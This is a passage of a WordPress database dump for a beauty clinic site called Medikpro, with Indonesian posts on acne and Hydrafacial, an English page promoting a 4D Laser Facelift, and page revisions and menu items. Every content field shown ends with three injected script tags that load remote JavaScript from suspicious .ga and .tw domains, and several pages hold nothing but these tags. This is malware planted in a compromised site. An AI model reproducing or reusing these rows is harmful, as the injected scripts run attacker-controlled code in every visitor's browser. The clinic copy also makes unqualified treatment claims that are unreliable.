title_labels=\"true\" order=\"DESC\" orderby=\"date\" posts_per_page=\"1\" post_offset=\"2\"][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Beauty Blog','','publish','closed','closed','','beauty-lounge-2','','','2017-12-27 05:39:06','2017-12-27 05:39:06','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6356',0,'page','',0),(6357,1,'2017-12-27 05:37:16','2017-12-27 05:37:16','Siapa yang tidak kesal bila memiliki kulit berjerawat? Apalagi, polusi udara kian hari kian meningkat. Debu dan kotoran menempel di wajah, bercampur dengan minyak yang menghiasi wajah kita. Jika ditambah dengan kebiasaan tidak membersihkan wajah setelah melakukan aktifitas diluar, sudah dipastikan wajah Anda menjadi sasaran empuk untuk jerawat tinggal di sana.\r\n<h2>Jerawat Bisa Disembuhkan</h2>\r\nJerawat pasti sudah pernah berkenalan dengan wajah setiap orang. Namun datangnya, tentu tidak akan disambut baik bukan? Berbagai cara dilakukan untuk mengusirnya jauh-jauh dari wajah. Mulai dari memberikan obat, menggunakan sabun cuci muka khusus, sampai yang paling parah dengan memecahkan jerawat dengan paksa. Padahal, jerawat bisa menyebar ke seluruh area wajah bila sembarangan di tangani dengan asal-asalan.\r\n\r\nAdapun cara lain yang dilakukan kebanyakan orang saat ini adalah Facial. Sedikit info saja, Facial yang tidak tepat dapat menimbulkan rasa sakit dan juga menimbulkan banyak efek samping seperti iritasi, kemerahan, alergi dan bahkan bisa menumbuhkan jerawat lebih banyak lagi. Jika begitu, apa ada perawatan yang tidak menimbulkan rasa sakit dan juga minim akan efek samping?\r\n\r\nMedikpro memperkenalkan Hydrafacial sebagai solusi kecantikan masa kini yang bebas dari rasa sakit karena alat yang digunakan berupa Vakum yang melunakkan kotoran sehingga mudah terangkat tanpa harus menekannya. Hydrafacial merupakan teknologi kecantikan terbaru dengan menggunakan teknik hydra dermabrasion yang dapat membersihkan, mengangkat sel kulit mati, melembabkan dan memberikan berbagai nutrisi seperti antioxidant, aloe vera dan vitamin yang dibutuhkan kulit wajah oleh penghantar serum kedalam kulit pada saat yang bersamaan.\r\n\r\nHydrafacial telah dikenal dan menjadi favorit treatment bagi banyak Hollywood Celebrity diantaranya Paris Hilton, Beyonce, Eva Mendes, dan masih banyak lagi. Dengan Hydrafacial, dapatkan sensasi menghilangkan jerawat yang aman dan nyaman bagi wajah Anda tanpa rasa sakit. Pastikan Anda memilih perawatan yang tepat, karena wajah Anda  perlu diberikan perawatan terbaik.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Jerawat','','publish','open','open','','jerawat','','','2017-12-27 05:37:16','2017-12-27 05:37:16','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6357',0,'post','',0),(6358,1,'2017-12-27 05:37:16','2017-12-27 05:37:16','Siapa yang tidak kesal bila memiliki kulit berjerawat? Apalagi, polusi udara kian hari kian meningkat. Debu dan kotoran menempel di wajah, bercampur dengan minyak yang menghiasi wajah kita. Jika ditambah dengan kebiasaan tidak membersihkan wajah setelah melakukan aktifitas diluar, sudah dipastikan wajah Anda menjadi sasaran empuk untuk jerawat tinggal di sana.\r\n<h2>Jerawat Bisa Disembuhkan</h2>\r\nJerawat pasti sudah pernah berkenalan dengan wajah setiap orang. Namun datangnya, tentu tidak akan disambut baik bukan? Berbagai cara dilakukan untuk mengusirnya jauh-jauh dari wajah. Mulai dari memberikan obat, menggunakan sabun cuci muka khusus, sampai yang paling parah dengan memecahkan jerawat dengan paksa. Padahal, jerawat bisa menyebar ke seluruh area wajah bila sembarangan di tangani dengan asal-asalan.\r\n\r\nAdapun cara lain yang dilakukan kebanyakan orang saat ini adalah Facial. Sedikit info saja, Facial yang tidak tepat dapat menimbulkan rasa sakit dan juga menimbulkan banyak efek samping seperti iritasi, kemerahan, alergi dan bahkan bisa menumbuhkan jerawat lebih banyak lagi. Jika begitu, apa ada perawatan yang tidak menimbulkan rasa sakit dan juga minim akan efek samping?\r\n\r\nMedikpro memperkenalkan Hydrafacial sebagai solusi kecantikan masa kini yang bebas dari rasa sakit karena alat yang digunakan berupa Vakum yang melunakkan kotoran sehingga mudah terangkat tanpa harus menekannya. Hydrafacial merupakan teknologi kecantikan terbaru dengan menggunakan teknik hydra dermabrasion yang dapat membersihkan, mengangkat sel kulit mati, melembabkan dan memberikan berbagai nutrisi seperti antioxidant, aloe vera dan vitamin yang dibutuhkan kulit wajah oleh penghantar serum kedalam kulit pada saat yang bersamaan.\r\n\r\nHydrafacial telah dikenal dan menjadi favorit treatment bagi banyak Hollywood Celebrity diantaranya Paris Hilton, Beyonce, Eva Mendes, dan masih banyak lagi. Dengan Hydrafacial, dapatkan sensasi menghilangkan jerawat yang aman dan nyaman bagi wajah Anda tanpa rasa sakit. Pastikan Anda memilih perawatan yang tepat, karena wajah Anda  perlu diberikan perawatan terbaik.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Jerawat','','inherit','closed','closed','','6357-revision-v1','','','2017-12-27 05:37:16','2017-12-27 05:37:16','',6357,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6357-revision-v1/',0,'revision','',0),(6359,1,'2017-12-27 05:39:06','2017-12-27 05:39:06','[vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][recent_posts style=\"default\" category=\"all\" columns=\"1\" title_labels=\"true\" order=\"DESC\" orderby=\"date\" posts_per_page=\"1\" post_offset=\"2\"][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Beauty Blog','','inherit','closed','closed','','6356-revision-v1','','','2017-12-27 05:39:06','2017-12-27 05:39:06','',6356,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6356-revision-v1/',0,'revision','',0),(6360,1,'2017-12-27 05:39:39','2017-12-27 05:39:39',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6360','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6360',95,'nav_menu_item','',0),(6361,1,'2017-12-27 05:40:29','2017-12-27 05:40:29','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','FAQ','','publish','closed','closed','','beauty-lounge-3','','','2017-12-27 05:40:29','2017-12-27 05:40:29','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6361',0,'page','',0),(6362,1,'2017-12-27 05:40:29','2017-12-27 05:40:29','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','FAQ','','inherit','closed','closed','','6361-revision-v1','','','2017-12-27 05:40:29','2017-12-27 05:40:29','',6361,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6361-revision-v1/',0,'revision','',0),(6363,1,'2017-12-27 05:41:18','2017-12-27 05:41:18',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6363','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6363',96,'nav_menu_item','',0),(6364,1,'2017-12-27 05:41:50','2017-12-27 05:41:50','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Testimonial','','publish','closed','closed','','beauty-lounge-4','','','2017-12-27 05:41:50','2017-12-27 05:41:50','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6364',0,'page','',0),(6365,1,'2017-12-27 05:41:50','2017-12-27 05:41:50','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Testimonial','','inherit','closed','closed','','6364-revision-v1','','','2017-12-27 05:41:50','2017-12-27 05:41:50','',6364,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6364-revision-v1/',0,'revision','',0),(6366,1,'2017-12-27 05:42:34','2017-12-27 05:42:34',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6366','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6366',97,'nav_menu_item','',0),(6367,1,'2017-12-27 05:42:54','2017-12-27 05:42:54','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Video','','publish','closed','closed','','beauty-lounge-5','','','2017-12-27 05:42:54','2017-12-27 05:42:54','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6367',0,'page','',0),(6368,1,'2017-12-27 05:42:54','2017-12-27 05:42:54','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Video','','inherit','closed','closed','','6367-revision-v1','','','2017-12-27 05:42:54','2017-12-27 05:42:54','',6367,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6367-revision-v1/',0,'revision','',0),(6369,1,'2017-12-27 05:43:30','2017-12-27 05:43:30',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6369','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6369',98,'nav_menu_item','',0),(6370,1,'2017-12-27 13:54:04','2017-12-27 13:54:04','[vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]tes[/vc_column_text][/vc_column][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6619\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6247\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]As a result of ageing, the skin loses its elasticity and firmness, also becomes flabby and dull and wrinkles begin to appear. But, with Our Non-Invasive and Non-Ablative Method: 4D Laser Facelift, We can restore You to more youthful appearance to the skin of the face and neck.\r\n\r\nUnlike any other laser treatments, 4D Laser Facelift are more dynamism and does not require any surgical procedures. The synergistic laser treatments treat both the exterior of the face as well as the interior oral cavity to produce results from both inside and out. With 4 unique laser modes : Smooth, Frac3, Piano, and SupErficial, 4D Laser Facelift can provides immediate and ongoing results.[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" bg_color=\"#5be008\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<ul>\r\n 	<li>SMOOTH</li>\r\n</ul>\r\nThis is the first step of the procedure and conducted on the inside of the oral cavity. This non-ablative laser will give the impacts on cheeks and lips and results in tightening, volumizing and restoring collagen starting from the inside out. This reduces the depth of the nasolabial and melomental folds, and help restore lip volume.\r\n<ul>\r\n 	<li>FRAC3</li>\r\n</ul>\r\nIn this second step, The Fractional beam is applied to the exterior of the face that targets deeper imperfections to restore a youthful texture and tone to the skin.\r\n\r\n[/vc_column_text][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6644\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6634\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<ul>\r\n 	<li>PIANO</li>\r\n</ul>\r\nWith a deep penetration of bulk tissue heating, this step will promote skin elasticity and tighten. This restores existing collagen and activates new collagen generation.\r\n<ul>\r\n 	<li>SupEficial</li>\r\n</ul>\r\nThe final step is used lastly to significantly improves skin smoothness, reduces skin surface irregularities and imperfections with an extremely controlled light peel. This step gives the skin a smoother pearl finish.\r\n\r\nThis treatment only performed once and does not require any recovery period. Medikpro wants to bring You into a new revolutionary method of laser rejuvenation and introduce You to a unique technology for the reconstruction of the facial skin. There is no pain and no downtime. You can continue Your daily activities right after treatment.[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" link_new_tab=\"true\" color=\"Accent-Color\" min_height=\"100\" link_url=\"https://www.google.com/maps\" link_text=\"Get Directions\"]\r\n<h3>San Francisco</h3>\r\n123 Nectar St. Suite 4917\r\nhello@themenectar.com[/fancy_box][/vc_column_inner][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6135\" link_new_tab=\"true\" color=\"Extra-Color-1\" min_height=\"100\" link_url=\"https://www.google.com/maps\" link_text=\"Get Directions\"]\r\n<h3>British Columbia</h3>\r\n58 Nectar Rd. Apt 2C\r\nhello@themenectar.com[/fancy_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','4D Laser Face Lifting','','publish','closed','closed','','facial-treatment-2','','','2018-01-11 04:48:34','2018-01-11 04:48:34','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6370',0,'page','',0),(6371,1,'2017-12-27 13:54:04','2017-12-27 13:54:04','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"5%\" bottom_padding=\"5%\" id=\"steps\" row_name=\"Sign Up Steps\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-5-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/12\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"5/12\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-xs-12\"][image_with_animation image_url=\"6247\" alignment=\"\" animation=\"Fade In From Left\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"5/12\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-xs-12\"][vc_column_text]As a result of ageing, the skin loses its elasticity and firmness, also becomes flabby and dull and wrinkles begin to appear. But, with Our Non-Invasive and Non-Ablative Method: 4D Laser Facelift, We can restore You to more youthful appearance to the skin of the face and neck.\r\n\r\nUnlike any other laser treatments, 4D Laser Facelift are more dynamism and does not require any surgical procedures. The synergistic laser treatments treat both the exterior of the face as well as the interior oral cavity to produce results from both inside and out. With 4 unique laser modes : Smooth, Frac3, Piano, and SupErficial, 4D Laser Facelift can provides immediate and ongoing results.\r\n<ul>\r\n 	<li>SMOOTH</li>\r\n</ul>\r\nThis is the first step of the procedure and conducted on the inside of the oral cavity. This non-ablative laser will give the impacts on cheeks and lips and results in tightening, volumizing and restoring collagen starting from the inside out. This reduces the depth of the nasolabial and melomental folds, and help restore lip volume.\r\n<ul>\r\n 	<li>FRAC3</li>\r\n</ul>\r\nIn this second step, The Fractional beam is applied to the exterior of the face that targets deeper imperfections to restore a youthful texture and tone to the skin.\r\n<ul>\r\n 	<li>PIANO</li>\r\n</ul>\r\nWith a deep penetration of bulk tissue heating, this step will promote skin elasticity and tighten. This restores existing collagen and activates new collagen generation.\r\n<ul>\r\n 	<li>SupEficial</li>\r\n</ul>\r\nThe final step is used lastly to significantly improves skin smoothness, reduces skin surface irregularities and imperfections with an extremely controlled light peel. This step gives the skin a smoother pearl finish.\r\n\r\nThis treatment only performed once and does not require any recovery period. Medikpro wants to bring You into a new revolutionary method of laser rejuvenation and introduce You to a unique technology for the reconstruction of the facial skin. There is no pain and no downtime. You can continue Your daily activities right after treatment.[/vc_column_text][/vc_column][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/12\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','4D Laser Face Lifting','','inherit','closed','closed','','6370-revision-v1','','','2017-12-27 13:54:04','2017-12-27 13:54:04','',6370,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6370-revision-v1/',0,'revision','',0),(6372,1,'2018-01-11 04:47:36','2018-01-11 04:47:36','<p>[vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]tes[/vc_column_text][/vc_column][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6619\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6247\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]As a result of ageing, the skin loses its elasticity and firmness, also becomes flabby and dull and wrinkles begin to appear. But, with Our Non-Invasive and Non-Ablative Method: 4D Laser Facelift, We can restore You to more youthful appearance to the skin of the face and neck.</p>\n<p>Unlike any other laser treatments, 4D Laser Facelift are more dynamism and does not require any surgical procedures. The synergistic laser treatments treat both the exterior of the face as well as the interior oral cavity to produce results from both inside and out. With 4 unique laser modes : Smooth, Frac3, Piano, and SupErficial, 4D Laser Facelift can provides immediate and ongoing results.[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" bg_color=\"#bec7ce\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]</p>\n<ul>\n<li>SMOOTH</li>\n</ul>\n<p>This is the first step of the procedure and conducted on the inside of the oral cavity. This non-ablative laser will give the impacts on cheeks and lips and results in tightening, volumizing and restoring collagen starting from the inside out. This reduces the depth of the nasolabial and melomental folds, and help restore lip volume.</p>\n<ul>\n<li>FRAC3</li>\n</ul>\n<p>In this second step, The Fractional beam is applied to the exterior of the face that targets deeper imperfections to restore a youthful texture and tone to the skin.</p>\n<p>[/vc_column_text][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6644\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6634\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][vc_column column_padding=\"padding-6-percent\" column_padding_position=\"left\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]</p>\n<ul>\n<li>PIANO</li>\n</ul>\n<p>With a deep penetration of bulk tissue heating, this step will promote skin elasticity and tighten. This restores existing collagen and activates new collagen generation.</p>\n<ul>\n<li>SupEficial</li>\n</ul>\n<p>The final step is used lastly to significantly improves skin smoothness, reduces skin surface irregularities and 